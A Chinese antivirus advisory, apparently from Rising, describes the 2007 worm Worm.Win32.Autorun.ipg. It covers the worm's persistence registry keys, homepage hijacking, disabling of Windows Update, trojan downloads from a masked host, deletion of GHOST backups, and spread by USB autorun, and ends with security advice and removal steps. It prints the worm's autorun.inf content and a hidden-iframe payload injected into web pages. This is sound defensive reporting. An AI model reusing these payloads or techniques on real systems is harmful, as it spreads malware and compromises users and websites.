天高云淡

危险等级：★★★
病毒名称：Worm.Win32.Autorun.ipg
截获时间：2007-9-25
入库版本：19.42.20
类型：蠕虫病毒

感染的操作系统：Windows XP, Windows NT, Windows Server 2003, Windows 2000

威胁情况：

传播级别：中

全球化传播态势：低

清除难度：困难

破坏力：高

破坏手段：感染，下载，传播

这是一个蠕虫病毒，用nspack加壳程序进行保护。

病毒会利用CreateMutex创建一个”baby”的互斥，保证系统中只有一个实例在运行，如这个互斥已经存在，则病毒直接退出。

1、该病毒运行后，驻留内存,释放文件到%Systemroot%\system32目录下名为:crsss.exe,并删除自身,释放的文件名和系统csrss.exe文件名及其相似，以此来迷惑用户。

2、修改如下注册表项：
(1)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
“crsss” = %SYSTEM%\CRSSS.EXE 达到开机自启动目的

(2)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\Folder\Hidden\SHOWALL
“CheckedValue” 的值为0X00000000，把文件查看设置不显示隐藏，达到隐藏文件显示的目的.

(3)HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
“start page” = HTTP://WWW.HAO123.COM
修改IE主页为：HTTP://WWW.HAO123.COM，并且调用系统文件REG.exe不停的在重写该项.

(4)HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001 ，修改IE主页属性使按钮失效，用户无法更改”主页”栏。

(5)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下面增加
DisableWindowsUpdateAccess项 并把其键值设为00000001 关闭windows自动更新功能.

3、下载http://aaa.xxxxxx.cn/htm/up1.txt，http://aaa.xxxxxx.cn/down/up2.txt到系统文件夹，然后读取up1.txt和up2.txt的内容（up1.txt和up2.txt的内容为下载木马的网址链接），并把下载的木马到系统文件夹,命名为:temp.exe。

4、病毒遍历本地所有存储设备,向可移动存储设备中,写入病毒本身niu.exe和autorun.inf.其中autorun.inf的内容为:：

[AutoRun]

open=niu.exe
shell\open=打开(&O)
shell\open\Command=niu.exe
shell\open\Default=1
shell\explore=资源治理器(&X)
shell\explore\Command=niu.EXE

5、每5000毫秒为周期访问系统可用的磁盘，如发现niu.exe和Autorun.inf不在则重写。

6、遍历磁盘，假如找到有*.GHO为后缀名的文件则删除，从而导致用户无法恢复系统（.GHO文件为系统还原工具GHOST的映像文件）

7、遍历磁盘，查找index.php、*.htm、default.php、conn.asp等网页文件，插入一段JS代码： <IfrAmE src=http://aaa.xxxxxx.cn/ceshi.htm width=0 height=0></IfrAmE>，完成网页挂马。

安全建议：

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件天天至少升级三次。

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3 不浏览不良网站，不随意下载安装可疑插件。

4 不接收QQ、MSN、Emial等传来的可疑文件。

5 上网时打开杀毒软件实时监控功能。

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到19.42.20版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。